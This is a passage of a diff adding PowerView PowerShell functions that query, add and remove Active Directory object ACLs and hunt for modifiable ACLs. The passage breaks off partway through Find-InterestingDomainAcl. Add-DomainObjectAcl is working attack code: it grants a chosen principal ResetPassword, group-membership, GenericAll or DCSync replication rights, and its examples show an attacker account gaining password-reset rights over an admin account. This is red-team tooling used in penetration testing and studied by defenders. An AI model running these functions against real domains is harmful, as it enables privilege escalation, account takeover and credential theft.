+ Write-Verbose "[Get-DomainObjectAcl] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $Searcher = Get-DomainSearcher @SearcherArguments + if (-not $Searcher) { + Write-Warning "[Get-DomainObjectAcl] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainObjectAcl] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + if ($Filter) { + $Searcher.filter = "(&$Filter)" + } + Write-Verbose "[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: $($Searcher.filter)" + + $Results = $Searcher.FindAll() + $Results | Where-Object {$_} | ForEach-Object { + $Object = $_.Properties + + if ($Object.objectsid -and $Object.objectsid[0]) { + $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value + } + else { + $ObjectSid = $Null + } + + try { + New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0 | ForEach-Object { if ($PSBoundParameters['Sacl']) {$_.SystemAcl} else {$_.DiscretionaryAcl} } | ForEach-Object { + if ($PSBoundParameters['RightsFilter']) { + $GuidFilter = Switch ($RightsFilter) { + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + 
'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
+ Default { '00000000-0000-0000-0000-000000000000' }
+ }
+ if ($_.ObjectType -eq $GuidFilter) {
+ $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+ $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
+ $Continue = $True
+ }
+ }
+ else {
+ $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+ $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
+ $Continue = $True
+ }
+
+ if ($Continue) {
+ $_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask))
+ if ($GUIDs) {
+ # if we're resolving GUIDs, map them them to the resolved hash table
+ $AclProperties = @{}
+ $_.psobject.properties | ForEach-Object {
+ if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') {
+ try {
+ $AclProperties[$_.Name] = $GUIDs[$_.Value.toString()]
+ }
+ catch {
+ $AclProperties[$_.Name] = $_.Value
+ }
+ }
+ else {
+ $AclProperties[$_.Name] = $_.Value
+ }
+ }
+ $OutObject = New-Object -TypeName PSObject -Property $AclProperties
+ $OutObject.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
+ $OutObject
+ }
+ else {
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
+ $_
+ }
+ }
+ }
+ }
+ catch {
+ Write-Verbose "[Get-DomainObjectAcl] Error: $_"
+ }
+ }
+ }
+ }
+}
+
+
+function Add-DomainObjectAcl {
+<#
+.SYNOPSIS
+
+Adds an ACL for a specific active directory object.
+
+AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+.DESCRIPTION
+
+This function modifies the ACL/ACE entries for a given Active Directory
+target object specified by -TargetIdentity. Available -Rights are
+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
+rights GUID can be set with -RightsGUID.
These rights are granted on the target
+object for the specified -PrincipalIdentity.
+
+.PARAMETER TargetIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain object to modify ACLs for. Required. Wildcards accepted.
+
+.PARAMETER TargetDomain
+
+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
+
+.PARAMETER TargetLDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory object targets.
+
+.PARAMETER TargetSearchBase
+
+The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER PrincipalIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain principal to add for the ACL. Required. Wildcards accepted.
+
+.PARAMETER PrincipalDomain
+
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Rights
+
+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
+Defaults to 'All'.
+
+.PARAMETER RightsGUID
+
+Manual GUID representing the right to add to the target.
+
+.EXAMPLE
+
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+...
+
+Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+.EXAMPLE
+
+$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
+
+[no results returned]
+
+$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))
+VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
+VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
+VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
+
+Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
+InheritanceFlags : None
+BinaryLength : 56
+AceType :
AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+.LINK
+
+https://adsecurity.org/?p=1906
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
+ Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $TargetIdentity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $TargetDomain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $TargetLDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $TargetSearchBase,
+
+ [Parameter(Mandatory = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $PrincipalIdentity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $PrincipalDomain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')]
+ [String]
+ $Rights = 'All',
+
+ [Guid]
+ $RightsGUID
+ )
+
+ BEGIN {
+ $TargetSearcherArguments = @{
+ 'Properties' = 'distinguishedname'
+ 'Raw' = $True
+ }
+ if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain
}
+ if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter }
+ if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase }
+ if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential }
+
+ $PrincipalSearcherArguments = @{
+ 'Identity' = $PrincipalIdentity
+ 'Properties' = 'distinguishedname,objectsid'
+ }
+ if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }
+ if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }
+ $Principals = Get-DomainObject @PrincipalSearcherArguments
+ if (-not $Principals) {
+ throw "Unable to resolve principal: $PrincipalIdentity"
+ }
+ }
+
+ PROCESS {
+ $TargetSearcherArguments['Identity'] = $TargetIdentity
+ $Targets = Get-DomainObject @TargetSearcherArguments
+
+ ForEach ($TargetObject in $Targets) {
+
+
$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None'
+ $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow'
+ $ACEs = @()
+
+ if ($RightsGUID) {
+ $GUIDs = @($RightsGUID)
+ }
+ else {
+ $GUIDs = Switch ($Rights) {
+ # ResetPassword doesn't need to know the user's current password
+ 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }
+ # allows for the modification of group membership
+ 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
+ # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
+ # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
+ # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c
+ # when applied to a domain's ACL, allows for the use of DCSync
+ 'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'}
+ }
+ }
+
+ ForEach ($PrincipalObject in $Principals) {
+ Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname)"
+
+ try {
+ $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid)
+
+ if ($GUIDs) {
+ ForEach ($GUID in $GUIDs) {
+ $NewGUID = New-Object Guid $GUID
+ $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight'
+ $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType
+ }
+ }
+ else {
+ # deault to GenericAll rights
+ $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll'
+ $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType
+ }
+
+ # add all the new ACEs to the specified object directory entry
+ ForEach ($ACE in $ACEs) {
+ Write-Verbose "[Add-DomainObjectAcl] Granting
principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)"
+ $TargetEntry = $TargetObject.GetDirectoryEntry()
+ $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl'
+ $TargetEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)
+ $TargetEntry.PsBase.CommitChanges()
+ }
+ }
+ catch {
+ Write-Verbose "[Add-DomainObjectAcl] Error granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname) : $_"
+ }
+ }
+ }
+ }
+}
+
+
+function Remove-DomainObjectAcl {
+<#
+.SYNOPSIS
+
+Removes an ACL from a specific active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+.DESCRIPTION
+
+This function modifies the ACL/ACE entries for a given Active Directory
+target object specified by -TargetIdentity. Available -Rights are
+'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
+rights GUID can be set with -RightsGUID. These rights are removed from the target
+object for the specified -PrincipalIdentity.
+
+.PARAMETER TargetIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain object to modify ACLs for. Required. Wildcards accepted.
+
+.PARAMETER TargetDomain
+
+Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
+
+.PARAMETER TargetLDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory object targets.
+
+.PARAMETER TargetSearchBase
+
+The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER PrincipalIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the domain principal to add for the ACL. Required. Wildcards accepted.
+
+.PARAMETER PrincipalDomain
+
+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Rights
+
+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
+Defaults to 'All'.
+
+.PARAMETER RightsGUID
+
+Manual GUID representing the right to add to the target.
+
+.EXAMPLE
+
+$UserSID = Get-DomainUser user | Select-Object -ExpandProperty objectsid
+Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID}
+
+[no results returned]
+
+Add-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword
+
+Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID }
+
+AceQualifier : AccessAllowed
+ObjectDN : CN=user2,CN=Users,DC=testlab,DC=local
+ActiveDirectoryRights : ExtendedRight
+ObjectAceType : User-Force-Change-Password
+ObjectSID : S-1-5-21-883232822-274137685-4173207997-2105
+InheritanceFlags : None
+BinaryLength : 56
+AceType : AccessAllowedObject
+ObjectAceFlags : ObjectAceTypePresent
+IsCallback : False
+PropagationFlags : None
+SecurityIdentifier : S-1-5-21-883232822-274137685-4173207997-2104
+AccessMask : 256
+AuditFlags : None
+IsInherited : False
+AceFlags : None
+InheritedObjectAceType : All
+OpaqueLength : 0
+
+
+Remove-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword
+
+Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID}
+
+[no results returned]
+
+.LINK
+
+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
+ Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $TargetIdentity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $TargetDomain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $TargetLDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $TargetSearchBase,
+
+ [Parameter(Mandatory = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $PrincipalIdentity,
+ + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')] + [String] + $Rights = 'All', + + [Guid] + $RightsGUID + ) + + BEGIN { + $TargetSearcherArguments = @{ + 'Properties' = 'distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain } + if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter } + if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase } + if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential } + + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if 
($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principals = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principals) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + } + + PROCESS { + $TargetSearcherArguments['Identity'] = $TargetIdentity + $Targets = Get-DomainObject @TargetSearcherArguments + + ForEach ($TargetObject in $Targets) { + + $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None' + $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow' + $ACEs = @() + + if ($RightsGUID) { + $GUIDs = @($RightsGUID) + } + else { + $GUIDs = Switch ($Rights) { + # ResetPassword doesn't need to know the user's current password + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + # allows for the modification of group membership + 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } + # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c + # when applied to a domain's ACL, allows for the use of DCSync + 'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'} + } + } + + ForEach ($PrincipalObject in $Principals) { + Write-Verbose "[Remove-DomainObjectAcl] Removing principal $($PrincipalObject.distinguishedname) '$Rights' from 
$($TargetObject.Properties.distinguishedname)" + + try { + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid) + + if ($GUIDs) { + ForEach ($GUID in $GUIDs) { + $NewGUID = New-Object Guid $GUID + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType + } + } + else { + # deault to GenericAll rights + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType + } + + # remove all the specified ACEs from the specified object directory entry + ForEach ($ACE in $ACEs) { + Write-Verbose "[Remove-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)" + $TargetEntry = $TargetObject.GetDirectoryEntry() + $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl' + $TargetEntry.PsBase.ObjectSecurity.RemoveAccessRule($ACE) + $TargetEntry.PsBase.CommitChanges() + } + } + catch { + Write-Verbose "[Remove-DomainObjectAcl] Error removing principal $($PrincipalObject.distinguishedname) '$Rights' from $($TargetObject.Properties.distinguishedname) : $_" + } + } + } + } +} + + +function Find-InterestingDomainAcl { +<# +.SYNOPSIS + +Finds object ACLs in the current (or specified) domain with modification +rights set to non-built in objects. + +Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. 
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName
+
+.DESCRIPTION
+
+This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
+and for each returned ACE entry it checks if principal security identifier
+is *-1000 (meaning the account is not built in), and also checks if the rights for
+the ACE mean the object can be modified by the principal. If these conditions are met,
+then the security identifier SID is translated, the domain object is retrieved, and
+additional IdentityReference* information is appended to the output object.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER ResolveGUIDs
+
+Switch. Resolve GUIDs to their display names.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Find-InterestingDomainAcl
+
+Finds interesting object ACLS in the current domain.
